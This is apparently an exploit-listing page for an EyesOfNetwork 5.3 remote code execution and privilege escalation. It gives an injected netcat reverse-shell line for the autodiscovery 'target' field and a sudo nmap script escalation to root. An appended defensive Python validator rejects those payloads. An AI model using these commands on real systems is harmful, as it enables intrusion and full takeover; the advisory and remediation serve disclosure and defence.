EyesOfNetwork 5.3 RCE & PrivEsc

CVE: CVE-2021-32819
Category: CWE-269
Price: $5,000
Severity: Critical
Author: Louis Nyffenegger
Risk: Critical
Exploitation Type: Remote
Date: 2021-01-11
CVSS:4.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

Below is a copy:

# Exploit Title: EyesOfNetwork 5.3 - RCE & PrivEsc
# Date: 10/01/2021
# Exploit Author: Audencia Business SCHOOL Red Team
# Vendor Homepage:
# Software Link:
# Version: 5.3

# Authenticated Remote Code Execution flaw > remote shell > PrivEsc
# A user with access to "/autodiscovery.php" can execute remote commands, get a reverse shell and root the targeted machine.

Initial RCE

On the web page: https://EyesOfNetwork_IP/lilac/autodiscovery.php

The "target" input is not validated. Any command can be appended after an "&", so RCE is possible with a simple netcat command such as:

& nc -e /bin/sh <IP> <PORT>

The EyesOfNetwork apache user can run "nmap" through sudo with the NOPASSWD attribute, so it is possible to become root using the classic PrivEsc method:
echo 'os.execute("/bin/sh")' > /tmp/nmap.script
sudo nmap --script=/tmp/nmap.script
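
Defensive counterpart to the unvalidated "target" input described above, as an added example that is not part of the original advisory or of EyesOfNetwork's code: the target is accepted only if it parses as an IP address, a CIDR range or a hostname, and nmap is started from an argument list so no shell ever sees the value. The function names, the nmap path and the "-sn" scan type are assumptions made for illustration.

```python
import ipaddress
import re
import subprocess

NMAP = "/usr/bin/nmap"  # assumed install path
# One DNS label: letters, digits, inner hyphens. No whitespace, no shell
# metacharacters, and no leading "-" that nmap would read as an option.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def validate_target(raw):
    """Return a canonical scan target, or raise ValueError."""
    value = raw.strip()
    if not value or len(value) > 253:
        raise ValueError("empty or oversized target")
    try:
        # Single addresses and CIDR ranges, IPv4 or IPv6.
        return str(ipaddress.ip_network(value, strict=False))
    except ValueError:
        pass
    host = value.rstrip(".")
    if all(_LABEL.fullmatch(label) for label in host.split(".")):
        return host
    raise ValueError("rejected target: %r" % raw)


def build_scan_argv(raw_target):
    """Build the nmap argument vector; "-sn" is an assumed scan type."""
    target = validate_target(raw_target)
    argv = [NMAP, "-sn"]
    if ":" in target:
        argv.append("-6")  # nmap needs -6 for IPv6 targets
    return argv + [target]


def run_scan(raw_target):
    # A list argv with shell=False means no shell ever parses the target.
    return subprocess.run(build_scan_argv(raw_target), shell=False,
                          capture_output=True, text=True, timeout=300)


if __name__ == "__main__":
    # Constructed samples: two valid targets, then the page's two payload shapes.
    for sample in ("192.0.2.10/24", "monitor01.example.org",
                   "192.0.2.10 & nc -e /bin/sh <IP> <PORT>",
                   "--script=/tmp/nmap.script"):
        try:
            print("accept", build_scan_argv(sample))
        except ValueError as exc:
            print("reject", exc)
```

Input validation only closes the web entry point; the NOPASSWD sudo rule for nmap has to be removed or narrowed separately, because any code running as the apache user can still use it.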
